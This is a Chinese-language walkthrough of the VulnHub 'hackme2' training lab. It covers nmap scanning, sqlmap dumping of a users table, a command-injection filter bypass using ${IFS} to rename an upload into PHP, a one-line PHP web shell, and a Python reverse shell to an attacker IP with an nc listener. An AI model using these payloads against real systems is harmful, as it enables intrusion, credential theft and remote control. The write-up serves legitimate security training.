hackme2 复现

admin 2024年11月1日14:17:05评论19 views字数 1955阅读6分31秒阅读模式

hackme2 复现  

环境下载  

下载链接:https://www.vulnhub.com/entry/hackme-2,618/

hackme2 复现

下载完成          

hackme2 复现

环境搭建  

打开虚拟机-》主页或虚拟机导航栏文件-》点击打开-》选中下载好的文件打开

打开之后

hackme2 复现

创建成功

查找ip与端口  

查看网络连接模式  

hackme2 复现

查看NAT模式下,虚拟机分配的ip地址段               

hackme2 复现

hackme2 复现

开启kali nmap扫描IP地址段  

(kali网络模式切换为NAT模式,确保都在同一网段,两台机器之间可以通信)

nmap 192.168.3.0/24              //扫描该网段存活的主机         

hackme2 复现

得到ip

扫描端口  

nmap 192.168.3.128 -p-            //扫描全端口            

hackme2 复现

访问页面   

hackme2 复现

注册登录,看看

hackme2 复现

SQL注入  

搜索框数据交互,存在SQL注入,post提交方式,抓包(和之前复现的hackme 靶场一样)

hackme2 复现

SQLmap工具注入  

sqlmap -r ini.txt --current-db            
           
解释:sqlmap -r 指定一个文件 、--current-db  获取当前数据库            

hackme2 复现

sqlmap -r ini.txt -D webapphacking --tables            
           
解释:获取指定webapphacking数据库下的所有表            

hackme2 复现

sqlmap -r ini.txt -D webapphacking -T users --dump            
           
解释:获取webapphacking数据库下users表中的数据            

hackme2 复现

解密之后。用户名:superadmin 密码:Uncrackable

用管理员的账号密码登录页面查看              

hackme2 复现

测试文件上传是否有漏洞              

hackme2 复现

hackme2 复现

hackme2 复现

测试下面的功能点                

hackme2 复现

hackme2 复现

可能存在命令注入

验证命令注入      

hackme2 复现

漏洞存在(绕过过滤)            

hackme2 复现

hackme2 复现

查看当前页面源码内容           

hackme2 复现

利用该漏洞与泄露的文件上传路径  

搭配试试,上传.jpg图片马 图片马内容为phpinfo();

hackme2 复现

在bp中,利用代码执行漏洞,修改上传文件的后缀名  

fname=1&lname=system('mv${IFS}/var/www/html/uploads/year2020/x.jpg${IFS}/var/www/html/uploads/year2020/x.php')&search=Search+User            

hackme2 复现

拼接路径浏览测试是否成功             

hackme2 复现

同样的原理,那么就可以上传一句话木马,修改后缀             

hackme2 复现

浏览访问

hackme2 复现

重点:  

访问不行

这里注意,存在的漏洞是命令执行漏洞,所以上传的一句话木马函数不是eval是

system(已经踩过坑了)

<?php @system($_GET[cmd]);?>

结合两个功能点,反弹shell  

上传命令执行的一句话木马

hackme2 复现

这里给大家推荐一个在线生成反弹shell命令的网站            
https://weibell.github.io/reverse-shell-generator/            

借用hackbar访问url,反弹shell               

hackme2 复现

export RHOST="192.168.3.129";            
export RPORT=8000;python -c 'import sys,socket,os,pty;            
s=socket.socket();            
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));            
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];            
pty.spawn("/bin/sh")'            

复制下来修改一下

拼接,上传的一句话木马文件,跟上传递的参数  

http://192.168.3.128/uploads/year2020/fantanML.php            
?cmd=export RHOST="192.168.3.129";            
export RPORT=8000;python -c 'import sys,socket,os,pty;            
s=socket.socket();            
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));            
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];            
pty.spawn("/bin/sh")'            

kali设置监听  

nc -lvnp 8000            

hackme2 复现

浏览器传递反弹shell的请求              

hackme2 复现

hackme2 复现

hackme2 复现

原文始发于微信公众号(小白摸坑学网安):hackme2 复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日14:17:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   hackme2 复现https://cn-sec.com/archives/2493340.html

发表评论

匿名网友 填写信息